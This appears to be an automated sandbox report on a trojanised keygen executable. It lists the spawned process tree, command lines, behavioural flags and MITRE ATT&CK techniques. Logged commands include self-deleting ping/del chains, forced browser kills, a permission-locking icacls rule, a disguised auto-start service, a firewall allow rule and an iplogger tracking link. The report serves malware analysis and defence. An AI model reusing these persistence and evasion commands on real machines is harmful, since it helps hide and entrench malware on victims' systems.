pid Process 636 Setup.exe 3528 6489A2274AE24900.exe 3956 6489A2274AE24900.exe 3972 firefox.exe 3996 1613216621223.exe 2164 firefox.exe 3884 1613216625786.exe 2504 firefox.exe 932 1613216631442.exe 1216 ThunderFW.exe 1128 MiniThunderPlatform.exe 3392 23E04C4F32EF2158.exe 2504 23E04C4F32EF2158.tmp 2712 seed.sfx.exe 2164 MicrosoftEdge.exe 4260 MicrosoftEdgeCP.exe 4260 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes

Process tree (nesting shows parent/child relationship; each entry lists the image path, the PID, the command line as recorded by the sandbox, and the behavioural signatures attributed to that process).

[PID 1628] C:\Users\Admin\AppData\Local\Temp\Palo_Alto_Business_Plan_Pro_serial_key_gen.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\Palo_Alto_Business_Plan_Pro_serial_key_gen.exe"
  - Suspicious use of WriteProcessMemory
  [PID 2500] C:\Windows\SysWOW64\cmd.exe
    cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
    - Suspicious use of WriteProcessMemory
    [PID 1864] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
      cmdline: keygen-pr.exe -p83fsase3Ge
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      [PID 3140] C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        [PID 3876] C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
    [PID 3688] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
      cmdline: keygen-step-1.exe
      - Executes dropped EXE
    [PID 3776] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
      cmdline: keygen-step-3.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      [PID 3784] C:\Windows\SysWOW64\cmd.exe
        cmdline: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
        - Suspicious use of WriteProcessMemory
        [PID 3984] C:\Windows\SysWOW64\PING.EXE
          cmdline: ping 1.1.1.1 -n 1 -w 3000
          - Runs ping.exe
    [PID 1340] C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
      cmdline: keygen-step-4.exe
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      [PID 636] C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
        - Executes dropped EXE
        - Checks whether UAC is enabled
        - Writes to the Master Boot Record (MBR)
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Modifies system certificate store
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        [PID 200] C:\Windows\SysWOW64\msiexec.exe
          cmdline: msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
          - Enumerates connected drives
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
        [PID 3528] C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 0011 installp1
          - Executes dropped EXE
          - Loads dropped DLL
          - Checks whether UAC is enabled
          - Writes to the Master Boot Record (MBR)
          - Suspicious use of SetThreadContext
          - Checks SCSI registry key(s)
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          [PID 3972] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            - Suspicious use of SetWindowsHookEx
          [PID 3996] C:\Users\Admin\AppData\Roaming\1613216621223.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613216621223.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216621223.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
          [PID 2164] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            - Suspicious use of SetWindowsHookEx
          [PID 3884] C:\Users\Admin\AppData\Roaming\1613216625786.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613216625786.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216625786.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
          [PID 2504] C:\Program Files\Mozilla Firefox\firefox.exe
            cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe"
            - Suspicious use of SetWindowsHookEx
          [PID 932] C:\Users\Admin\AppData\Roaming\1613216631442.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\1613216631442.exe" /sjson "C:\Users\Admin\AppData\Roaming\1613216631442.txt"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
          [PID 1216] C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
          [PID 1128] C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
            cmdline: "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
            - Executes dropped EXE
            - Loads dropped DLL
            - Writes to the Master Boot Record (MBR)
            - Suspicious use of SetWindowsHookEx
          [PID 3392] C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
            - Executes dropped EXE
            - Suspicious use of SetWindowsHookEx
            [PID 2504] C:\Users\Admin\AppData\Local\Temp\is-G1VE2.tmp\23E04C4F32EF2158.tmp
              cmdline: "C:\Users\Admin\AppData\Local\Temp\is-G1VE2.tmp\23E04C4F32EF2158.tmp" /SL5="$900EE,815708,121344,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
              - Executes dropped EXE
              - Drops file in Program Files directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of FindShellTrayWindow
              - Suspicious use of SetWindowsHookEx
              [PID 2712] C:\Program Files (x86)\HappyNewYear\seed.sfx.exe
                cmdline: "C:\Program Files (x86)\HappyNewYear\seed.sfx.exe" -pX7mdks39WE0 -s1
                - Executes dropped EXE
                - Drops file in Program Files directory
                - Suspicious use of SetWindowsHookEx
                [PID 2280] C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                  cmdline: "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                  - Executes dropped EXE
                  - Loads dropped DLL
                  - Checks SCSI registry key(s)
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious behavior: MapViewOfSection
              [PID 3808] C:\Windows\SysWOW64\cmd.exe
                cmdline: "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                - Checks computer location settings
          [PID 4416] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
            [PID 4468] C:\Windows\SysWOW64\PING.EXE
              cmdline: ping 127.0.0.1 -n 3
              - Runs ping.exe
        [PID 3956] C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe 200 installp1
          - Executes dropped EXE
          - Checks whether UAC is enabled
          - Writes to the Master Boot Record (MBR)
          - Checks SCSI registry key(s)
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          [PID 3644] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd.exe /c taskkill /f /im chrome.exe
            - Suspicious use of WriteProcessMemory
            [PID 2920] C:\Windows\SysWOW64\taskkill.exe
              cmdline: taskkill /f /im chrome.exe
              - Kills process with taskkill
          [PID 1244] C:\Windows\SysWOW64\cmd.exe
            cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\6489A2274AE24900.exe"
            [PID 3656] C:\Windows\SysWOW64\PING.EXE
              cmdline: ping 127.0.0.1 -n 3
              - Runs ping.exe
        [PID 3152] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
          - Suspicious use of WriteProcessMemory
          [PID 640] C:\Windows\SysWOW64\PING.EXE
            cmdline: ping 127.0.0.1 -n 3
            - Runs ping.exe
      [PID 3440] C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
        - Executes dropped EXE
        - Checks whether UAC is enabled
        [PID 1836] C:\Windows\SysWOW64\WerFault.exe
          cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 2764
          - Drops file in Windows directory
          - Program crash
          - Suspicious behavior: EnumeratesProcesses
      [PID 4484] C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        [PID 5196] C:\Users\Admin\AppData\Roaming\B5DE.tmp.exe
          cmdline: "C:\Users\Admin\AppData\Roaming\B5DE.tmp.exe"

[PID 2424] C:\Windows\system32\msiexec.exe
  cmdline: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  [PID 3828] C:\Windows\syswow64\MsiExec.exe
    cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DAEFE7D0BD0F4E42D77FF0DEBF433252 C
    - Loads dropped DLL

[PID 2164] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Control Panel
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

[PID 3048] C:\Windows\system32\browser_broker.exe
  cmdline: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

[PID 4260] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

[PID 4328] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies Internet Explorer settings
  - Modifies registry class

[PID 4892] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class

[PID 4984] C:\Users\Admin\AppData\Local\Temp\8132.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\8132.exe
  - Executes dropped EXE
  - Adds Run key to start application
  [PID 2196] C:\Windows\SysWOW64\icacls.exe
    cmdline: icacls "C:\Users\Admin\AppData\Local\b1facd0d-4dd5-495c-8d07-6e6f4f4b88c6" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    - Modifies file permissions
  [PID 396] C:\Users\Admin\AppData\Local\Temp\8132.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\8132.exe" --Admin IsNotAutoStart IsNotTask
    - Executes dropped EXE
    [PID 4816] C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin1.exe
      cmdline: "C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin1.exe"
      - Executes dropped EXE
    [PID 5016] C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin2.exe
      cmdline: "C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin2.exe"
      - Executes dropped EXE
    [PID 5036] C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe
      cmdline: "C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe"
      - Executes dropped EXE
      [PID 5040] C:\Windows\SysWOW64\cmd.exe
        cmdline: /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\updatewin.exe
        [PID 5184] C:\Windows\SysWOW64\timeout.exe
          cmdline: timeout /t 3
          - Delays execution with timeout.exe
    [PID 5052] C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\5.exe
      cmdline: "C:\Users\Admin\AppData\Local\1a61e257-295c-4354-9e3c-17622d03a145\5.exe"

[PID 5004] C:\Users\Admin\AppData\Local\Temp\83A4.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\83A4.exe
  - Executes dropped EXE
  [PID 5316] C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im 83A4.exe /f & erase C:\Users\Admin\AppData\Local\Temp\83A4.exe & exit

[PID 5088] C:\Users\Admin\AppData\Local\Temp\8887.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\8887.exe
  - Executes dropped EXE

[PID 2128] C:\Users\Admin\AppData\Local\Temp\90E5.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\90E5.exe
  - Executes dropped EXE

[PID 4828] C:\Users\Admin\AppData\Local\Temp\955A.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\955A.exe
  - Executes dropped EXE
  [PID 5028] C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ebpypiix\
  [PID 732] C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\rielcbfj.exe" C:\Windows\SysWOW64\ebpypiix\
  [PID 2852] C:\Windows\SysWOW64\sc.exe
    cmdline: "C:\Windows\System32\sc.exe" create ebpypiix binPath= "C:\Windows\SysWOW64\ebpypiix\rielcbfj.exe /d\"C:\Users\Admin\AppData\Local\Temp\955A.exe\"" type= own start= auto DisplayName= "wifi support"
  [PID 1604] C:\Windows\SysWOW64\sc.exe
    cmdline: "C:\Windows\System32\sc.exe" description ebpypiix "wifi internet conection"
  [PID 5012] C:\Windows\SysWOW64\sc.exe
    cmdline: "C:\Windows\System32\sc.exe" start ebpypiix
  [PID 5084] C:\Windows\SysWOW64\netsh.exe
    cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

[PID 2664] C:\Users\Admin\AppData\Local\Temp\9BE3.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\9BE3.exe
  - Executes dropped EXE

[PID 5112] C:\Users\Admin\AppData\Local\Temp\A664.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\A664.exe

[PID 3344] C:\Windows\SysWOW64\ebpypiix\rielcbfj.exe
  cmdline: C:\Windows\SysWOW64\ebpypiix\rielcbfj.exe /d"C:\Users\Admin\AppData\Local\Temp\955A.exe"
  [PID 3432] C:\Windows\SysWOW64\svchost.exe
    cmdline: svchost.exe

[PID 1624] C:\Windows\system32\vssvc.exe
  cmdline: C:\Windows\system32\vssvc.exe

[PID 1256] C:\Users\Admin\AppData\Local\Temp\B3C3.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\B3C3.exe

[PID 5308] C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
  cmdline: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
Network
MITRE ATT&CK Enterprise v6 (technique and number of matching signatures)

Persistence
- Bootkit: 1
- Modify Existing Service: 1
- New Service: 1
- Registry Run Keys / Startup Folder: 1

Defense Evasion
- File and Directory Permissions Modification: 1
- Install Root Certificate: 1
- Modify Registry: 3

Web Service: 1